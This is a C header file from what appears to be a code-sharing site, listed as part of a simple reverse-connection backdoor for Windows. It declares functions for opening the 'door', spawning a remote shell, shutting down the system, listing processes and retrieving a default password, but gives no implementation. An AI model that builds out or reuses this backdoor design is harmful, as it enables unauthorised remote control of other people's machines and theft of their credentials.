door.h
来自「用VC编译的简单的反向连接后门」· C头文件 代码 · 共 30 行
H
30 行
#ifndef _DLL_H_
#define _DLL_H_
#include <windows.h>
#if BUILDING_DLL
# define DLLIMPORT __declspec (dllexport)
#else /* Not BUILDING_DLL */
# define DLLIMPORT __declspec (dllimport)
#endif /* Not BUILDING_DLL */
//=====================PlusIn Functions==================================
DLLIMPORT DWORD WINAPI start();
int open_door(SOCKET sock);
int show_help(SOCKET target);
int init_door();
int get_shell(SOCKET target);
int shutdown_os(SOCKET target, int flag);
int list_process(SOCKET target);
int get_default_pass(SOCKET target);
char * adjust_cmd(char *in);
int WINAPI WinMain( HINSTANCE hInstance, // handle to current instance
HINSTANCE hPrevInstance, // handle to previous instance
LPSTR lpCmdLine, // pointer to command line
int nCmdShow // show state of window
);
#define G_OPTION_FILE_NAME "appdll.ini"
#endif /* _DLL_H_ */
⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?